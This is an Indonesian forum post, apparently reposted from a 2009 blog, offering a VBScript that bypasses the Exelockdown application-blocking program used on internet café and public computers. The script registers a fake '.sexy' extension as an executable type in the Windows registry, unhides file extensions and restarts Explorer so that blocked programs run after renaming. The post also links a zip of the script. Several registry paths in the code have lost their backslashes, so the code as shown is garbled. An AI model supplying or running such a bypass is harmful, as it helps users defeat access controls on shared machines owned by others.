By Pass Program Exe Blocker : Executable Lock Down dengan Registry Shell Spawning
Saya post artikel ini sekaligus ngecek apakah Jasakom sudah sehat atau belum ? Semoga sudah benar-benar sehat.
Pada kesempatan kali ini seperti biasa saya sekedar berbagi tips gampang memby pass proteksi program security yaitu Exelockdown.
Program ini fungsinya untuk mencegah instalasi program, mencegah program jalan selain program yang terdaftar jadi – cocoknya dipakai di warnet atau game center. Atau gampangannya di kompie umum deh.
Cara membypass program ini selain dengan merekayasa lokasi passwordnya bisa dilakukan dengan cara seperti ini :
Buat ekstensi baru karena program ini tampaknya mengenali file exe dari ekstensinya. Anggap saja di contoh ini saya buat ekstensi baru bernama sexy, rename saja file exe menjadi sexy. Daftarkan ekstensi sexy sehingga diperlakukan sama seperti file exe. Dah intinya cuma gicu.
Aplikasi praktisnya bisa memakai script vbs di bawah ini :
==============================
const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
QUOT = chr(34)
strComputer = “.”
On error resume next
Tanya = MsgBox(“By Pass Exelockdown dengan Registry Shell Spawning”& _
vbNewLine & “Reset Exelockdown?”, 36,”Exelockdown Hacking – by Lovepassword”)
If Tanya = 6 Then ‘Bila dipilih YA
Set objRegistry = GetObject(“winmgmts:{impersonationLevel=impersonate}!\” &strComputer & ” ootdefault:StdRegProv”)
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexy”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,,”exefile”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,”Content Type”,”application/x-msdownload”
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexyPersistentHandler”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexyPersistentHandler”,,”{098f2470-bae0-11cd-b579-08002b30bfeb}”
objRegistry.CreateKey HKEY_CURRENT_USER, “SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced”
objRegistry.SetDWORDValue HKEY_CURRENT_USER,”SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced”,”HideFileExt”,0
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate}!\” & strComputer & ” ootcimv2″)
Set colProcessList = objWMIService.ExecQuery _
(“SELECT * FROM Win32_Process WHERE Name = ‘explorer.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next
set objShell = createobject(“Wscript.Shell”)
objShell.Run “explorer.exe”
msgbox “Copi file exe, rename menjadi file sexy, lalu jalankan”,vbInformation,”Exelockdown Hacking – by Lovepassword”
End If
=============================
Jalankan script, rename file exe jadi sexy lalu jalankan file sexy tersebut.
SUMBER :
http://lovepassword.blogspot.com/2009/09/registry-shell-spawning-untuk-by-pass.html
SCRIPT BISA DIDOWNLOAD di :
http://www.ziddu.com/download/6759316/EXELOCKDOWN_SIKAT.zip.html
SALAM Semuanya
535 kali dilihat – Lihat komentar (0)
